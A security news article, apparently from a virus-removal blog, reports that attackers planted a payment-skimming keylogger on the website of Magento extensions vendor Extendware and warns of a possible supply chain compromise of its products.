Attackers deployed a skimmer on the site of Magento extensions provider

Hackers have hit Extendware, a creator of extensions for CMS Magento-based sites. Attackers introduced a skimmer to the organization’s website and could also infect its products.

Criminals have been present on Extendware infrastructure since October 4.

The malicious script is a standard keylogger. It copies the payment data of users and sends them to a third-party web site. Analysts believe that the destination is another hacked site.

Experts found the skimmer on the Extendware website, but warned that there might be an attack on the supply chain.

“In theory, they could have injected a backdoor or skimmer in all of the Extendware products, thereby gaining control of all stores that would install their software. This is also known as a “supply chain attack”, — report Sanguine Security company specialists.

The ability to write data to the Extendware server allows criminals to compromise the distributions stored there by injecting malicious code into them too. This means that all trading floors using the extensions of this supplier are in danger.

Read also: With the use of new malware Turla intercepts TLS traffic

Experts reported the incident to Extendware developers and asked if it had any impact on the integrity of the software hosted on the server. At the time of writing, the company did not publish a statement in this regard – the last entry in the news feed is dated September 12, on Facebook and Twitter – October 1.

“Because e-commerce vendors are such an attractive target to payment skimmers, this Extendware case suggests that attackers may have used a novel method to gain access”, — report Sanguine Security researchers.

Extendware hacking became known shortly after security experts presented a detailed study of cyber attacks on Magento sites. Among other things, experts noted the growing interest of criminals in supply chains, which allow them significantly increase coverage.

At the end of 2018, analysts of several information security companies placed such attacks on the list of major threats in the nearest future. This forecast was quickly confirmed – in recent years, criminals have compromised the repository of extensions and PHP applications, the official update service of ASUS, as well as several companies from the gaming industry.

Experts recommend that Extendware customers do not install extensions downloaded in the last week and released during this period.

William Reddy

I am from Ireland. My parents bought me a computer when I was 11, and several month after I have got a virus on this PC. I decided to enter the INSA Centre Val de Loire university after being graduated from the school. This French educational institution was offering a brand-new cybersecurity course. After getting the master degree in cybersecurity, I've started working in as virus analyst in a little anti-malware vendor. In 2018, I've decided to start Virus Removal project. The main target of this site is to help people to deal with PC viruses of any kind.

Leave a Reply

Your email address will not be published.


Back to top button